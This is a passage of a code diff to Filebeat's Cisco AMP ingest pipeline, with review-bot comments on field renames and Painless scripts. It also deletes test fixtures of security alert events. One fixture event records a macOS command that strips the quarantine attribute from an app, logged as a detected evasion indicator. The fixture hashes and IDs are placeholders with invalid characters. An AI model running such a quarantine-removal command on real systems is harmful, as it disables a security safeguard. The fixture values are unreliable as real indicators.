+    if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String"
+- rename:
+    field: cisco.amp.tactics
+    target_field: cisco.amp.mitre_tactics
+    if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String"
+
 ######################
 ## ECS Host Mapping ##
 ######################
@@ -189,6 +198,10 @@ processors:
     field: cisco.amp.file.parent.process_id
     target_field: process.pid
     ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.process_id
+    target_field: process.pid
+    ignore_missing: true
 - rename:
     field: cisco.amp.file.parent.file_name
     target_field: process.name
@@ -205,10 +218,9 @@ processors:
     field: cisco.amp.file.parent.identity.md5
     target_field: process.hash.md5
     ignore_missing: true
-
 - rename:
-    field: cisco.amp.network_info.parent.process_id
-    target_field: process.pid
+    field: cisco.amp.file.parent.identity.md5
+    target_field: process.hash.md5
     ignore_missing: true
 - rename:
     field: cisco.amp.network_info.parent.file_name
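Review bot: The two rename conditions inspect only element `[0]` (`ctx?.cisco?.amp?.techniques[0] instanceof String`), so a list that mixes ID strings with objects is moved wholesale into the keyword-mapped `cisco.amp.mitre_techniques` and the object entries then fail to index; whether the AMP API guarantees homogeneous lists is not visible here. A comment above the first rename stating that assumption would help the next maintainer: `# AMP reports tactics/techniques either as a list of ID strings or of objects; only the string form is moved to the keyword mitre_* field.` If mixed lists are possible, the guard can be tightened to something like `ctx.cisco.amp.techniques.stream().allMatch(t -> t instanceof String)`, with the same change for `tactics`.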
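Review bot: `cisco.amp.network_info.parent.process_id` now renames into `process.pid` directly after the `cisco.amp.file.parent.process_id` rename does, and neither carries `ignore_failure`; rename fails when the target field already exists, so an event carrying both a `file.parent` and a `network_info.parent` would fail the whole pipeline. Presumably an AMP event has only one of the two, but that is not visible in this hunk; a guard such as `if: ctx?.process?.pid == null` on the added processor, or a comment recording the exclusivity, would make the intent explicit. The `cisco.amp.network_info.parent.file_name` rename that follows in the next hunk most likely overlaps with `cisco.amp.file.parent.file_name` → `process.name` in the same way.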
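Review bot: After this hunk the pipeline carries two consecutive identical processors renaming `cisco.amp.file.parent.identity.md5` to `process.hash.md5`: the two added lines reproduce the block that forms the hunk's leading context, while the `network_info.parent.process_id` rename removed here was re-added by the hunk at -189. The duplicate is inert because `ignore_missing: true` hides the already-renamed field, but it reads as an accidental edit and the whole second `- rename:` entry should be deleted, leaving the md5 rename followed directly by the `network_info.parent.file_name` one. The hunk layout was collapsed in my view (10 old lines to 9 new), so confirm against the file that the second copy really exists before removing it.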
@@ -300,21 +312,39 @@ processors:
     value: "{{ cisco.amp.computer.external_ip }}"
     if: ctx?.cisco?.amp?.computer?.external_ip != null
     allow_duplicates: false
-- foreach:
-    field: cisco.amp.computer.network_addresses
-    processor:
-      append:
-        field: related.ip
-        value: "{{ _ingest._value.ip }}"
-        allow_duplicates: false
+- script:
+    lang: painless
+    source: |
+      if (ctx?.related == null) {
+        ctx.related = new HashMap();
+      }
+      if (ctx?.related?.ip == null) {
+        ctx.related.ip = new ArrayList();
+      }
+      for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+        if (addr.ip != null && !addr.ip.isEmpty()) {
+          if (!ctx?.related?.ip.contains(addr.ip)) {
+            ctx?.related?.ip.add(addr.ip);
+          }
+        }
+      }
     if: ctx?.cisco?.amp?.computer?.network_addresses != null
-- foreach:
-    field: cisco.amp.computer.network_addresses
-    processor:
-      append:
-        field: cisco.amp.related.mac
-        value: "{{ _ingest._value.mac }}"
-        allow_duplicates: false
+- script:
+    lang: painless
+    source: |
+      if (ctx?.cisco?.amp?.related == null) {
+        ctx.cisco.amp.related = new HashMap();
+      }
+      if (ctx?.cisco?.amp?.related?.mac == null) {
+        ctx.cisco.amp.related.mac = new ArrayList();
+      }
+      for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+        if (addr.mac != null && !addr.mac.isEmpty()) {
+          if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) {
+            ctx?.cisco?.amp?.related?.mac.add(addr.mac);
+          }
+        }
+      }
     if: ctx?.cisco?.amp?.computer?.network_addresses != null
 - foreach:
     field: cisco.amp.vulnerabilities
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log
deleted file mode 100644
index 14599ecfc0cc..000000000000
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log
+++ /dev/null
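Review bot: Both scripts iterate `network_addresses` without checking that it is a list and run without `ignore_failure`, so a single `network_addresses` object or any other non-list value throws and fails the whole event; the condition on each script should be `if: ctx?.cisco?.amp?.computer?.network_addresses instanceof List`. Inside the loops the null-safe `ctx?.related?.ip.contains(...)` and `ctx?.related?.ip.add(...)` are redundant after the explicit initialisation a few lines above and suggest the path could still be null; plain `ctx.related.ip.contains(addr.ip)` matches the style already used in `ctx.related.ip = new ArrayList();`, and the same applies to the `cisco.amp.related.mac` script. Both scripts also assume a pre-existing `related.ip` / `cisco.amp.related.mac` is a List; if anything earlier in the pipeline sets either as a scalar, `add` throws, which this hunk alone cannot rule out.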
@@ -1,8 +0,0 @@ -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} -{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit 
Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. 
Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} -{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} -{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} -{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} -{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} 
-{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat 
Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-509
4"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115
","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237",
"score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json deleted file mode 100644 index 52efeb8e97ba..000000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json +++ /dev/null 
@@ -1,87 +0,0 @@ -[ - { - "@timestamp": "2020-11-11T09:51:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "192.168.196.22", - "mac": "aa:d9:ac:af:1d:ad" - }, - { - "ip": "192.168.120.1", - "mac": "12:24:56:c2:00:01" - }, - { - "ip": "192.168.160.1", - "mac": "12:50:56:c2:53:08" - } - ], - "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345", - "cisco.amp.detection": "W32.Trojan.22gp.1201", - "cisco.amp.detection_id": "12365423467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", - "cisco.amp.group_guids": [ - "6542345gdfs-234-sdf2-34-6345243" - ], - "cisco.amp.related.mac": [ - "aa:d9:ac:af:1d:ad", - "12:24:56:c2:00:01", - "12:50:56:c2:53:08" - ], - "cisco.amp.timestamp_nanoseconds": 153000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 123578990, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477", - "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa", - "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "file.name": "HYXiN3hY.exe.part", - "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part", - "fileset.name": "amp", - "host.hostname": "testhost", - "host.name": "testhost", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@domain", - "input.type": "log", - "log.offset": 0, - "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb", - "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da", - "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab", - "process.name": "firefox.exe", - 
"process.pid": 88, - "related.hash": [ - "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc", - "9a8557b98ed1469272fa0ace91d63477", - "d0c4192b65e36553fvfd2b83f3113f6ae8390baa" - ], - "related.hosts": [ - "testhost" - ], - "related.ip": [ - "8.8.8.8", - "192.168.196.22", - "192.168.120.1", - "192.168.160.1" - ], - "related.user": [ - "user@domain" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - } -] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log new file mode 100644 index 000000000000..211de5d2bc95 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log 
